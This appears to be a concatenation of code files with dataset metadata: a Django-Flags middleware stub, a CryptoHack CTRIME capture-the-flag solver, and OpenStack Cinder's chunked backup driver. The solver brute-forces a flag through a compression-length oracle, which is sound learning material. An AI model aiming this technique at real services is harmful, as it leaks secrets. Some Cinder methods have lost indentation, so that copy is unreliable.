    reference it do not crash; it warns and removes itself from the chain."""

    def __init__(self, get_response):
        # Message string is byte-identical to the previous implementation.
        message = (
            "FlagConditionsMiddleware is deprecated and no longer has any "
            "effect. It will be removed in a future version of Django-Flags. "
        )
        warnings.warn(message, FutureWarning)
        # Tells Django to drop this middleware from the middleware chain.
        raise MiddlewareNotUsed
| 27.857143 | 79 | 0.684615 |
795470524ee045bfe3de358d7ed1a49b8dacdcfa | 1,020 | py | Python | cryptohack/ctrime/ctrime.py | onealmond/hacking-lab | 631e615944add02db3c2afef47bf1de7171eb065 | [
"MIT"
] | 9 | 2021-04-20T15:28:36.000Z | 2022-03-08T19:53:48.000Z | cryptohack/ctrime/ctrime.py | onealmond/hacking-lab | 631e615944add02db3c2afef47bf1de7171eb065 | [
"MIT"
] | null | null | null | cryptohack/ctrime/ctrime.py | onealmond/hacking-lab | 631e615944add02db3c2afef47bf1de7171eb065 | [
"MIT"
] | 6 | 2021-06-24T03:25:21.000Z | 2022-02-20T21:44:52.000Z | #!/usr/bin/env python3
import time
import requests
import string
def print_blk(hex_blks, sz):
    """Print *hex_blks* split into chunks of *sz* characters, separated by
    two spaces, followed by a trailing newline."""
    chunks = [hex_blks[pos:pos + sz] for pos in range(0, len(hex_blks), sz)]
    for chunk in chunks:
        print(chunk, ' ', end='')
    print()
def encrypt(plain):
    """Query the CryptoHack CTRIME oracle with a hex-encoded plaintext.

    :param plain: hex string of the plaintext to append to the flag
    :return: hex ciphertext string from the oracle's JSON response
    """
    url = 'http://aes.cryptohack.org/ctrime/encrypt/'
    rsp = requests.get(url + plain + '/')
    return rsp.json()['ciphertext']
# Candidate flag characters, ordered so the most likely ones ('}', '!', '_',
# '@', '?', then upper case, digits, lower case) are tried first.
alphabet = '}'+'!'+'_'+'@'+'?'+string.ascii_uppercase+string.digits+string.ascii_lowercase
def bruteforce():
    """Recover the flag one character at a time via a CRIME-style
    compression oracle: the server compresses (flag || our input) before
    encrypting, so a guess matching the next flag character compresses
    better and keeps the ciphertext length at the current minimum ``mi``.
    """
    flag = b'crypto{'
    cipher = encrypt(flag.hex())
    # Baseline ciphertext length for the known prefix.
    mi = len(cipher)
    while True:
        for c in alphabet:
            cipher = encrypt((flag+c.encode()).hex())
            print(c, len(cipher))
            if mi == len(cipher):
                # Length did not grow: accept c as the next flag character.
                flag += c.encode()
                mi = len(cipher)
                print(mi, flag)
                break
            if c == alphabet[-1]:
                # No candidate kept the length; relax the length budget by 2
                # hex chars (one byte) and retry the whole alphabet.
                mi += 2
                break
        time.sleep(1)
        if flag.endswith(b'}'):
            print(flag)
            break
| 23.72093 | 90 | 0.512745 |
7954705ffaab5c71c11f77875ee00d15f66974ea | 36,632 | py | Python | cinder/backup/chunkeddriver.py | scottwedge/openstack-cinder | 08e90b0d89d6f7e84cb774f82d0886dde131ce98 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | scottwedge/openstack-cinder | 08e90b0d89d6f7e84cb774f82d0886dde131ce98 | [
"Apache-2.0"
] | null | null | null | cinder/backup/chunkeddriver.py | scottwedge/openstack-cinder | 08e90b0d89d6f7e84cb774f82d0886dde131ce98 | [
"Apache-2.0"
] | null | null | null | # Copyright (C) 2012 Hewlett-Packard Development Company, L.P.
# Copyright (c) 2014 TrilioData, Inc
# Copyright (c) 2015 EMC Corporation
# Copyright (C) 2015 Kevin Fox <kevin@efox.cc>
# Copyright (C) 2015 Tom Barron <tpb@dyncloud.net>
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Generic base class to implement metadata, compression and chunked data
operations
"""
import abc
import hashlib
import json
import os
import sys
import eventlet
from oslo_config import cfg
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder.backup import driver
from cinder import exception
from cinder.i18n import _
from cinder import objects
from cinder.objects import fields
from cinder.volume import utils as volume_utils
if sys.platform == 'win32':
from os_win import utilsfactory as os_win_utilsfactory
LOG = logging.getLogger(__name__)
# oslo.config options registered by this module; the compression choice is
# consumed by ChunkedBackupDriver via _get_compressor().
backup_opts = [
    cfg.StrOpt('backup_compression_algorithm',
               default='zlib',
               ignore_case=True,
               choices=['none', 'off', 'no',
                        'zlib', 'gzip',
                        'bz2', 'bzip2'],
               help='Compression algorithm (None to disable)'),
]

CONF = cfg.CONF
CONF.register_opts(backup_opts)
# Object writer and reader returned by inheriting classes must not have any
# logging calls, as well as the compression libraries, as eventlet has a bug
# (https://github.com/eventlet/eventlet/issues/432) that would result in
# failures.
@six.add_metaclass(abc.ABCMeta)
class ChunkedBackupDriver(driver.BackupDriver):
"""Abstract chunked backup driver.
Implements common functionality for backup drivers that store volume
data in multiple "chunks" in a backup repository when the size of
the backed up cinder volume exceeds the size of a backup repository
"chunk."
Provides abstract methods to be implemented in concrete chunking
drivers.
"""
DRIVER_VERSION = '1.0.0'
DRIVER_VERSION_MAPPING = {'1.0.0': '_restore_v1'}
def _get_compressor(self, algorithm):
try:
if algorithm.lower() in ('none', 'off', 'no'):
return None
if algorithm.lower() in ('zlib', 'gzip'):
import zlib as compressor
result = compressor
elif algorithm.lower() in ('bz2', 'bzip2'):
import bz2 as compressor
result = compressor
else:
result = None
if result:
# NOTE(geguileo): Compression/Decompression starves
# greenthreads so we use a native thread instead.
return eventlet.tpool.Proxy(result)
except ImportError:
pass
err = _('unsupported compression algorithm: %s') % algorithm
raise ValueError(err)
    def __init__(self, context, chunk_size_bytes, sha_block_size_bytes,
                 backup_default_container, enable_progress_timer,
                 db=None):
        """Initialize the chunked driver.

        :param context: request context, forwarded to the base driver
        :param chunk_size_bytes: size of each backup "chunk" object
        :param sha_block_size_bytes: block size used for the SHA-256 digests
            that drive incremental backups
        :param backup_default_container: container used when the backup
            object does not already name one
        :param enable_progress_timer: whether to periodically emit progress
            notifications while backing up
        :param db: optional DB API override for the base driver
        :raises exception.InvalidConfigurationValue: on Windows, when
            chunk_size_bytes is not a multiple of 4096
        """
        super(ChunkedBackupDriver, self).__init__(context, db)
        self.chunk_size_bytes = chunk_size_bytes
        self.sha_block_size_bytes = sha_block_size_bytes
        self.backup_default_container = backup_default_container
        self.enable_progress_timer = enable_progress_timer
        self.backup_timer_interval = CONF.backup_timer_interval
        self.data_block_num = CONF.backup_object_number_per_notification
        self.az = CONF.storage_availability_zone
        self.backup_compression_algorithm = CONF.backup_compression_algorithm
        # May raise ValueError for an unknown algorithm (see _get_compressor).
        self.compressor = \
            self._get_compressor(CONF.backup_compression_algorithm)
        self.support_force_delete = True
        if sys.platform == 'win32' and self.chunk_size_bytes % 4096:
            # The chunk size must be a multiple of the sector size. In order
            # to fail out early and avoid attaching the disks, we'll just
            # enforce the chunk size to be a multiple of 4096.
            err = _("Invalid chunk size. It must be a multiple of 4096.")
            raise exception.InvalidConfigurationValue(message=err)
def _get_object_writer(self, container, object_name, extra_metadata=None):
"""Return writer proxy-wrapped to execute methods in native thread."""
writer = self.get_object_writer(container, object_name, extra_metadata)
return eventlet.tpool.Proxy(writer)
def _get_object_reader(self, container, object_name, extra_metadata=None):
"""Return reader proxy-wrapped to execute methods in native thread."""
reader = self.get_object_reader(container, object_name, extra_metadata)
return eventlet.tpool.Proxy(reader)
# To create your own "chunked" backup driver, implement the following
# abstract methods.
    @abc.abstractmethod
    def put_container(self, container):
        """Create the container if needed. No failure if it pre-exists.

        :param container: name of the backup container to create
        """
        return
    @abc.abstractmethod
    def get_container_entries(self, container, prefix):
        """Get container entry names.

        :param container: container to list
        :param prefix: only names starting with this prefix are returned
        :return: the matching object names (used as a list by callers)
        """
        return
    @abc.abstractmethod
    def get_object_writer(self, container, object_name, extra_metadata=None):
        """Returns a writer object which stores the chunk data in backup repository.

        The object returned should be a context handler that can be used in a
        "with" context.

        The object writer methods must not have any logging calls, as eventlet
        has a bug (https://github.com/eventlet/eventlet/issues/432) that would
        result in failures.

        :param container: container to write into
        :param object_name: name of the object to create
        :param extra_metadata: driver-specific metadata from
            get_extra_metadata(), may be None
        """
        return
    @abc.abstractmethod
    def get_object_reader(self, container, object_name, extra_metadata=None):
        """Returns a reader object for the backed up chunk.

        The object reader methods must not have any logging calls, as eventlet
        has a bug (https://github.com/eventlet/eventlet/issues/432) that would
        result in failures.

        :param container: container holding the object
        :param object_name: name of the object to read
        :param extra_metadata: driver-specific metadata from
            get_extra_metadata(), may be None
        """
        return
    @abc.abstractmethod
    def delete_object(self, container, object_name):
        """Delete object from container.

        :param container: container holding the object
        :param object_name: name of the object to delete
        """
        return
    @abc.abstractmethod
    def _generate_object_name_prefix(self, backup):
        """Return the name prefix shared by all of this backup's objects.

        The value is stored in backup.service_metadata and chunk objects are
        named '<prefix>-<sequence number>' (see _backup_chunk).
        """
        return
    @abc.abstractmethod
    def update_container_name(self, backup, container):
        """Allow sub-classes to override container name.

        This method exists so that sub-classes can override the container name
        as it comes in to the driver in the backup object. Implementations
        should return None if no change to the container name is desired.

        :param backup: the backup object being processed
        :param container: the container name currently on the backup
        """
        return
    @abc.abstractmethod
    def get_extra_metadata(self, backup, volume):
        """Return extra metadata to use in prepare_backup.

        This method allows for collection of extra metadata in prepare_backup()
        which will be passed to get_object_reader() and get_object_writer().
        Subclass extensions can use this extra information to optimize
        data transfers. Return a json serializable object.

        :param backup: the backup object being processed
        :param volume: the DB volume record being backed up
        """
        return
    def _create_container(self, backup):
        """Resolve and create the backup's container; return its name.

        The chosen name is persisted on the backup object before the
        container is created in the backend.
        """
        # Container's name will be decided by the driver (returned by method
        # update_container_name), if no change is required by the driver then
        # we'll use the one the backup object already has, but if it doesn't
        # have one backup_default_container will be used.
        new_container = self.update_container_name(backup, backup.container)
        if new_container:
            # If the driver is not really changing the name we don't want to
            # dirty the field in the object and save it to the DB with the same
            # value.
            if new_container != backup.container:
                backup.container = new_container
        elif backup.container is None:
            backup.container = self.backup_default_container
        LOG.debug('_create_container started, container: %(container)s,'
                  'backup: %(backup_id)s.',
                  {'container': backup.container, 'backup_id': backup.id})
        # Persist the (possibly updated) container name before creating it.
        backup.save()
        self.put_container(backup.container)
        return backup.container
def _generate_object_names(self, backup):
prefix = backup['service_metadata']
object_names = self.get_container_entries(backup['container'], prefix)
LOG.debug('generated object list: %s.', object_names)
return object_names
def _metadata_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_metadata' % object_name
return filename
def _sha256_filename(self, backup):
object_name = backup['service_metadata']
filename = '%s_sha256file' % object_name
return filename
    def _write_metadata(self, backup, volume_id, container, object_list,
                        volume_meta, extra_metadata=None):
        """Serialize the backup's metadata and store it as an object.

        :param backup: the backup being finalized
        :param volume_id: id of the backed-up volume
        :param container: container to write the metadata object into
        :param object_list: per-chunk records built by _backup_chunk
        :param volume_meta: JSON string of volume metadata (may be None)
        :param extra_metadata: optional driver-specific metadata
        """
        filename = self._metadata_filename(backup)
        LOG.debug('_write_metadata started, container name: %(container)s,'
                  ' metadata filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        metadata = {}
        metadata['version'] = self.DRIVER_VERSION
        metadata['backup_id'] = backup['id']
        metadata['volume_id'] = volume_id
        metadata['backup_name'] = backup['display_name']
        metadata['backup_description'] = backup['display_description']
        metadata['created_at'] = str(backup['created_at'])
        metadata['objects'] = object_list
        metadata['parent_id'] = backup['parent_id']
        metadata['volume_meta'] = volume_meta
        if extra_metadata:
            metadata['extra_metadata'] = extra_metadata
        metadata_json = json.dumps(metadata, sort_keys=True, indent=2)
        # The object store expects bytes on Python 3.
        if six.PY3:
            metadata_json = metadata_json.encode('utf-8')
        with self._get_object_writer(container, filename) as writer:
            writer.write(metadata_json)
        LOG.debug('_write_metadata finished. Metadata: %s.', metadata_json)
    def _write_sha256file(self, backup, volume_id, container, sha256_list):
        """Serialize the backup's SHA-256 block digests and store them.

        The stored chunk_size lets a later incremental backup verify it is
        using the same hash block size (see backup()).

        :param backup: the backup being finalized
        :param volume_id: id of the backed-up volume
        :param container: container to write the sha256 object into
        :param sha256_list: per-block SHA-256 hex digests of the volume data
        """
        filename = self._sha256_filename(backup)
        LOG.debug('_write_sha256file started, container name: %(container)s,'
                  ' sha256file filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        sha256file = {}
        sha256file['version'] = self.DRIVER_VERSION
        sha256file['backup_id'] = backup['id']
        sha256file['volume_id'] = volume_id
        sha256file['backup_name'] = backup['display_name']
        sha256file['backup_description'] = backup['display_description']
        sha256file['created_at'] = six.text_type(backup['created_at'])
        sha256file['chunk_size'] = self.sha_block_size_bytes
        sha256file['sha256s'] = sha256_list
        sha256file_json = json.dumps(sha256file, sort_keys=True, indent=2)
        # The object store expects bytes on Python 3.
        if six.PY3:
            sha256file_json = sha256file_json.encode('utf-8')
        with self._get_object_writer(container, filename) as writer:
            writer.write(sha256file_json)
        LOG.debug('_write_sha256file finished.')
    def _read_metadata(self, backup):
        """Fetch and deserialize the backup's metadata object.

        :param backup: backup whose metadata object should be read
        :return: the metadata dict written by _write_metadata
        """
        container = backup['container']
        filename = self._metadata_filename(backup)
        LOG.debug('_read_metadata started, container name: %(container)s, '
                  'metadata filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        with self._get_object_reader(container, filename) as reader:
            metadata_json = reader.read()
        # Object store returns bytes on Python 3; decode before json.loads.
        if six.PY3:
            metadata_json = metadata_json.decode('utf-8')
        metadata = json.loads(metadata_json)
        LOG.debug('_read_metadata finished. Metadata: %s.', metadata_json)
        return metadata
    def _read_sha256file(self, backup):
        """Fetch and deserialize the backup's SHA-256 digest object.

        :param backup: backup whose sha256 object should be read
        :return: the dict written by _write_sha256file
        """
        container = backup['container']
        filename = self._sha256_filename(backup)
        LOG.debug('_read_sha256file started, container name: %(container)s, '
                  'sha256 filename: %(filename)s.',
                  {'container': container, 'filename': filename})
        with self._get_object_reader(container, filename) as reader:
            sha256file_json = reader.read()
        # Object store returns bytes on Python 3; decode before json.loads.
        if six.PY3:
            sha256file_json = sha256file_json.decode('utf-8')
        sha256file = json.loads(sha256file_json)
        LOG.debug('_read_sha256file finished.')
        return sha256file
    def _prepare_backup(self, backup):
        """Prepare the backup process and return the backup metadata.

        Creates the container, generates and persists the object name prefix,
        and builds the bookkeeping dicts that _backup_chunk will mutate.

        :param backup: the backup object to prepare
        :return: tuple (object_meta, object_sha256, extra_metadata,
            container, volume_size_bytes)
        :raises exception.InvalidVolume: if the volume size is not positive
        """
        volume = self.db.volume_get(self.context, backup.volume_id)
        if volume['size'] <= 0:
            err = _('volume size %d is invalid.') % volume['size']
            raise exception.InvalidVolume(reason=err)
        container = self._create_container(backup)
        object_prefix = self._generate_object_name_prefix(backup)
        # Persist the prefix so object names can be regenerated on restore.
        backup.service_metadata = object_prefix
        backup.save()
        volume_size_bytes = volume['size'] * units.Gi
        availability_zone = self.az
        LOG.debug('starting backup of volume: %(volume_id)s,'
                  ' volume size: %(volume_size_bytes)d, object names'
                  ' prefix %(object_prefix)s, availability zone:'
                  ' %(availability_zone)s',
                  {
                      'volume_id': backup.volume_id,
                      'volume_size_bytes': volume_size_bytes,
                      'object_prefix': object_prefix,
                      'availability_zone': availability_zone,
                  })
        object_meta = {'id': 1, 'list': [], 'prefix': object_prefix,
                       'volume_meta': None}
        object_sha256 = {'id': 1, 'sha256s': [], 'prefix': object_prefix}
        extra_metadata = self.get_extra_metadata(backup, volume)
        if extra_metadata is not None:
            object_meta['extra_metadata'] = extra_metadata
        return (object_meta, object_sha256, extra_metadata, container,
                volume_size_bytes)
    def _backup_chunk(self, backup, container, data, data_offset,
                      object_meta, extra_metadata):
        """Backup data chunk based on the object metadata and offset.

        Compresses (if beneficial), writes the chunk object, and appends the
        chunk's record (offset, length, compression, md5) to
        object_meta['list'], incrementing object_meta['id'] in place.
        """
        object_prefix = object_meta['prefix']
        object_list = object_meta['list']
        object_id = object_meta['id']
        object_name = '%s-%05d' % (object_prefix, object_id)
        obj = {}
        obj[object_name] = {}
        obj[object_name]['offset'] = data_offset
        obj[object_name]['length'] = len(data)
        LOG.debug('Backing up chunk of data from volume.')
        algorithm, output_data = self._prepare_output_data(data)
        obj[object_name]['compression'] = algorithm
        LOG.debug('About to put_object')
        with self._get_object_writer(
                container, object_name, extra_metadata=extra_metadata
        ) as writer:
            writer.write(output_data)
        # MD5 is computed over the *uncompressed* data, in a native thread to
        # avoid starving greenthreads.
        md5 = eventlet.tpool.execute(hashlib.md5, data).hexdigest()
        obj[object_name]['md5'] = md5
        LOG.debug('backup MD5 for %(object_name)s: %(md5)s',
                  {'object_name': object_name, 'md5': md5})
        object_list.append(obj)
        object_id += 1
        object_meta['list'] = object_list
        object_meta['id'] = object_id
        LOG.debug('Calling eventlet.sleep(0)')
        # Yield to other greenthreads between chunks.
        eventlet.sleep(0)
    def _prepare_output_data(self, data):
        """Optionally compress a chunk before it is written out.

        :param data: raw chunk bytes
        :return: tuple (algorithm name, bytes to write); falls back to
            ('none', data) when compression is disabled or ineffective
        """
        if self.compressor is None:
            return 'none', data
        data_size_bytes = len(data)
        # Execute compression in native thread so it doesn't prevent
        # cooperative greenthread switching.
        compressed_data = self.compressor.compress(data)
        comp_size_bytes = len(compressed_data)
        algorithm = CONF.backup_compression_algorithm.lower()
        if comp_size_bytes >= data_size_bytes:
            LOG.debug('Compression of this chunk was ineffective: '
                      'original length: %(data_size_bytes)d, '
                      'compressed length: %(compressed_size_bytes)d. '
                      'Using original data for this chunk.',
                      {'data_size_bytes': data_size_bytes,
                       'compressed_size_bytes': comp_size_bytes,
                       })
            return 'none', data
        LOG.debug('Compressed %(data_size_bytes)d bytes of data '
                  'to %(comp_size_bytes)d bytes using %(algorithm)s.',
                  {'data_size_bytes': data_size_bytes,
                   'comp_size_bytes': comp_size_bytes,
                   'algorithm': algorithm,
                   })
        return algorithm, compressed_data
    def _finalize_backup(self, backup, container, object_meta, object_sha256):
        """Write the backup's metadata to the backup repository.

        Stores the sha256 file and metadata objects, then records the final
        object count on the backup and saves it.
        """
        object_list = object_meta['list']
        object_id = object_meta['id']
        volume_meta = object_meta['volume_meta']
        sha256_list = object_sha256['sha256s']
        extra_metadata = object_meta.get('extra_metadata')
        self._write_sha256file(backup,
                               backup.volume_id,
                               container,
                               sha256_list)
        self._write_metadata(backup,
                             backup.volume_id,
                             container,
                             object_list,
                             volume_meta,
                             extra_metadata)
        # NOTE(whoami-rajat) : The object_id variable is used to name
        # the backup objects and hence differs from the object_count
        # variable, therefore the increment of object_id value in the last
        # iteration of _backup_chunk() method shouldn't be reflected in the
        # object_count variable.
        backup.object_count = object_id - 1
        backup.save()
        LOG.debug('backup %s finished.', backup['id'])
    def _backup_metadata(self, backup, object_meta):
        """Backup volume metadata.

        NOTE(dosaboy): the metadata we are backing up is obtained from a
                       versioned api so we should not alter it in any way here.
                       We must also be sure that the service that will perform
                       the restore is compatible with version used.
        """
        json_meta = self.get_metadata(backup['volume_id'])
        if not json_meta:
            LOG.debug("No volume metadata to backup.")
            return
        # Stored in object_meta and written out later by _finalize_backup.
        object_meta["volume_meta"] = json_meta
def _send_progress_end(self, context, backup, object_meta):
object_meta['backup_percent'] = 100
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
def _send_progress_notification(self, context, backup, object_meta,
total_block_sent_num, total_volume_size):
backup_percent = total_block_sent_num * 100 / total_volume_size
object_meta['backup_percent'] = backup_percent
volume_utils.notify_about_backup_usage(context,
backup,
"createprogress",
extra_usage_info=
object_meta)
    def _get_win32_phys_disk_size(self, disk_path):
        """Return the exact size in bytes of a Windows physical disk.

        Needed because reading past a raw disk's end raises IOError and the
        file object cannot seek to the end (see backup()).
        """
        win32_diskutils = os_win_utilsfactory.get_diskutils()
        disk_number = win32_diskutils.get_device_number_from_device_name(
            disk_path)
        return win32_diskutils.get_disk_size(disk_number)
def _calculate_sha(self, data):
"""Calculate SHA256 of a data chunk.
This method cannot log anything as it is called on a native thread.
"""
# NOTE(geguileo): Using memoryview to avoid data copying when slicing
# for the sha256 call.
chunk = memoryview(data)
shalist = []
off = 0
datalen = len(chunk)
while off < datalen:
chunk_end = min(datalen, off + self.sha_block_size_bytes)
block = chunk[off:chunk_end]
sha = hashlib.sha256(block).hexdigest()
shalist.append(sha)
off += self.sha_block_size_bytes
return shalist
def backup(self, backup, volume_file, backup_metadata=True):
    """Backup the given volume.

    If backup['parent_id'] is given, then an incremental backup
    is performed.

    Args:
        backup: Backup object to populate; ``backup.parent_id`` (if set)
            selects the parent for an incremental backup.
        volume_file: open file-like handle positioned over the volume data.
        backup_metadata: when True, also back up the volume metadata.
    """
    # Hashes are computed per sha-block, so chunks must contain a whole
    # number of sha blocks for incremental diffing to line up.
    if self.chunk_size_bytes % self.sha_block_size_bytes:
        err = _('Chunk size is not multiple of '
                'block size for creating hash.')
        raise exception.InvalidBackup(reason=err)

    # Read the shafile of the parent backup if backup['parent_id']
    # is given.
    parent_backup_shafile = None
    parent_backup = None
    if backup.parent_id:
        parent_backup = objects.Backup.get_by_id(self.context,
                                                 backup.parent_id)
        parent_backup_shafile = self._read_sha256file(parent_backup)
        parent_backup_shalist = parent_backup_shafile['sha256s']
        if (parent_backup_shafile['chunk_size'] !=
                self.sha_block_size_bytes):
            err = (_('Hash block size has changed since the last '
                     'backup. New hash block size: %(new)s. Old hash '
                     'block size: %(old)s. Do a full backup.')
                   % {'old': parent_backup_shafile['chunk_size'],
                      'new': self.sha_block_size_bytes})
            raise exception.InvalidBackup(reason=err)
        # If the volume size increased since the last backup, fail
        # the incremental backup and ask user to do a full backup.
        if backup.size > parent_backup.size:
            err = _('Volume size increased since the last '
                    'backup. Do a full backup.')
            raise exception.InvalidBackup(reason=err)

    if sys.platform == 'win32':
        # When dealing with Windows physical disks, we need the exact
        # size of the disk. Attempting to read passed this boundary will
        # lead to an IOError exception. At the same time, we cannot
        # seek to the end of file.
        win32_disk_size = self._get_win32_phys_disk_size(volume_file.name)

    (object_meta, object_sha256, extra_metadata, container,
     volume_size_bytes) = self._prepare_backup(backup)

    counter = 0
    total_block_sent_num = 0

    # There are two mechanisms to send the progress notification.
    # 1. The notifications are periodically sent in a certain interval.
    # 2. The notifications are sent after a certain number of chunks.
    # Both of them are working simultaneously during the volume backup,
    # when "chunked" backup drivers are deployed.
    def _notify_progress():
        self._send_progress_notification(self.context, backup,
                                         object_meta,
                                         total_block_sent_num,
                                         volume_size_bytes)
    timer = loopingcall.FixedIntervalLoopingCall(
        _notify_progress)
    if self.enable_progress_timer:
        timer.start(interval=self.backup_timer_interval)

    sha256_list = object_sha256['sha256s']
    shaindex = 0
    is_backup_canceled = False

    while True:
        # First of all, we check the status of this backup. If it
        # has been changed to delete or has been deleted, we cancel the
        # backup process to do forcing delete.
        with backup.as_read_deleted():
            backup.refresh()
        if backup.status in (fields.BackupStatus.DELETING,
                             fields.BackupStatus.DELETED):
            is_backup_canceled = True
            # To avoid the chunk left when deletion complete, need to
            # clean up the object of chunk again.
            self.delete_backup(backup)
            LOG.debug('Cancel the backup process of %s.', backup.id)
            break
        data_offset = volume_file.tell()

        if sys.platform == 'win32':
            # Clamp the read so we never run past the physical disk end.
            read_bytes = min(self.chunk_size_bytes,
                             win32_disk_size - data_offset)
        else:
            read_bytes = self.chunk_size_bytes
        data = volume_file.read(read_bytes)

        if data == b'':
            break

        # Calculate new shas with the datablock.
        shalist = eventlet.tpool.execute(self._calculate_sha, data)
        sha256_list.extend(shalist)

        # If parent_backup is not None, that means an incremental
        # backup will be performed.
        if parent_backup:
            # Find the extent that needs to be backed up.
            extent_off = -1
            for idx, sha in enumerate(shalist):
                if sha != parent_backup_shalist[shaindex]:
                    if extent_off == -1:
                        # Start of new extent.
                        extent_off = idx * self.sha_block_size_bytes
                else:
                    if extent_off != -1:
                        # We've reached the end of extent.
                        extent_end = idx * self.sha_block_size_bytes
                        segment = data[extent_off:extent_end]
                        self._backup_chunk(backup, container, segment,
                                           data_offset + extent_off,
                                           object_meta,
                                           extra_metadata)
                        extent_off = -1
                shaindex += 1
            # The last extent extends to the end of data buffer.
            if extent_off != -1:
                extent_end = len(data)
                segment = data[extent_off:extent_end]
                self._backup_chunk(backup, container, segment,
                                   data_offset + extent_off,
                                   object_meta, extra_metadata)
                extent_off = -1
        else: # Do a full backup.
            self._backup_chunk(backup, container, data, data_offset,
                               object_meta, extra_metadata)
        # Notifications
        total_block_sent_num += self.data_block_num
        counter += 1
        if counter == self.data_block_num:
            # Send the notification to Ceilometer when the chunk
            # number reaches the data_block_num. The backup percentage
            # is put in the metadata as the extra information.
            self._send_progress_notification(self.context, backup,
                                             object_meta,
                                             total_block_sent_num,
                                             volume_size_bytes)
            # Reset the counter
            counter = 0

    # Stop the timer.
    timer.stop()
    # If backup has been cancelled we have nothing more to do
    # but timer.stop().
    if is_backup_canceled:
        return
    # All the data have been sent, the backup_percent reaches 100.
    self._send_progress_end(self.context, backup, object_meta)

    object_sha256['sha256s'] = sha256_list
    if backup_metadata:
        try:
            self._backup_metadata(backup, object_meta)
        # Whatever goes wrong, we want to log, cleanup, and re-raise.
        except Exception:
            with excutils.save_and_reraise_exception():
                LOG.exception("Backup volume metadata failed.")
                self.delete_backup(backup)

    self._finalize_backup(backup, container, object_meta, object_sha256)
def _restore_v1(self, backup, volume_id, metadata, volume_file,
                requested_backup):
    """Restore a v1 volume backup.

    Raises BackupRestoreCancel on any requested_backup status change, we
    ignore the backup parameter for this check since that's only the
    current data source from the list of backup sources.
    """
    backup_id = backup['id']
    LOG.debug('v1 volume backup restore of %s started.', backup_id)
    extra_metadata = metadata.get('extra_metadata')
    container = backup['container']
    metadata_objects = metadata['objects']
    metadata_object_names = []
    for obj in metadata_objects:
        metadata_object_names.extend(obj.keys())
    LOG.debug('metadata_object_names = %s.', metadata_object_names)
    # The metadata and sha256 bookkeeping files are not data objects.
    prune_list = [self._metadata_filename(backup),
                  self._sha256_filename(backup)]
    object_names = [object_name for object_name in
                    self._generate_object_names(backup)
                    if object_name not in prune_list]

    # Sanity check: stored objects must match what the metadata claims.
    if sorted(object_names) != sorted(metadata_object_names):
        err = _('restore_backup aborted, actual object list '
                'does not match object list stored in metadata.')
        raise exception.InvalidBackup(reason=err)

    for metadata_object in metadata_objects:
        # Abort when status changes to error, available, or anything else
        with requested_backup.as_read_deleted():
            requested_backup.refresh()
        if requested_backup.status != fields.BackupStatus.RESTORING:
            raise exception.BackupRestoreCancel(back_id=backup.id,
                                                vol_id=volume_id)
        # Each metadata object is a single-entry dict: {name: info}.
        object_name, obj = list(metadata_object.items())[0]
        LOG.debug('restoring object. backup: %(backup_id)s, '
                  'container: %(container)s, object name: '
                  '%(object_name)s, volume: %(volume_id)s.',
                  {
                      'backup_id': backup_id,
                      'container': container,
                      'object_name': object_name,
                      'volume_id': volume_id,
                  })

        with self._get_object_reader(
                container, object_name,
                extra_metadata=extra_metadata) as reader:
            body = reader.read()
        compression_algorithm = metadata_object[object_name]['compression']
        decompressor = self._get_compressor(compression_algorithm)
        # Write the chunk back at its recorded offset within the volume.
        volume_file.seek(obj['offset'])
        if decompressor is not None:
            LOG.debug('decompressing data using %s algorithm',
                      compression_algorithm)
            decompressed = decompressor.decompress(body)
            volume_file.write(decompressed)
        else:
            volume_file.write(body)

        # force flush every write to avoid long blocking write on close
        volume_file.flush()

        # Be tolerant to IO implementations that do not support fileno()
        try:
            fileno = volume_file.fileno()
        except IOError:
            LOG.info("volume_file does not support fileno() so skipping "
                     "fsync()")
        else:
            os.fsync(fileno)

        # Restoring a backup to a volume can take some time. Yield so other
        # threads can run, allowing for among other things the service
        # status to be updated
        eventlet.sleep(0)
    LOG.debug('v1 volume backup restore of %s finished.',
              backup_id)
def restore(self, backup, volume_id, volume_file):
    """Restore the given volume backup from backup repository.

    Raises BackupRestoreCancel on any backup status change.
    """
    backup_id = backup['id']
    container = backup['container']
    object_prefix = backup['service_metadata']
    LOG.debug('starting restore of backup %(object_prefix)s '
              'container: %(container)s, to volume %(volume_id)s, '
              'backup: %(backup_id)s.',
              {
                  'object_prefix': object_prefix,
                  'container': container,
                  'volume_id': volume_id,
                  'backup_id': backup_id,
              })
    metadata = self._read_metadata(backup)
    metadata_version = metadata['version']
    LOG.debug('Restoring backup version %s', metadata_version)
    # DRIVER_VERSION_MAPPING maps a metadata version to the name of the
    # restore method (e.g. '_restore_v1'); .get() returns None for an
    # unknown version, which makes getattr raise TypeError below.
    try:
        restore_func = getattr(self, self.DRIVER_VERSION_MAPPING.get(
            metadata_version))
    except TypeError:
        err = (_('No support to restore backup version %s')
               % metadata_version)
        raise exception.InvalidBackup(reason=err)

    # Build a list of backups based on parent_id. A full backup
    # will be the last one in the list.
    backup_list = []
    backup_list.append(backup)
    current_backup = backup
    while current_backup.parent_id:
        prev_backup = objects.Backup.get_by_id(self.context,
                                               current_backup.parent_id)
        backup_list.append(prev_backup)
        current_backup = prev_backup

    # Do a full restore first, then layer the incremental backups
    # on top of it in order.
    index = len(backup_list) - 1
    while index >= 0:
        backup1 = backup_list[index]
        index = index - 1
        metadata = self._read_metadata(backup1)
        restore_func(backup1, volume_id, metadata, volume_file, backup)

        volume_meta = metadata.get('volume_meta', None)
        try:
            if volume_meta:
                self.put_metadata(volume_id, volume_meta)
            else:
                LOG.debug("No volume metadata in this backup.")
        except exception.BackupMetadataUnsupportedVersion:
            msg = _("Metadata restore failed due to incompatible version.")
            LOG.error(msg)
            raise exception.BackupOperationError(msg)

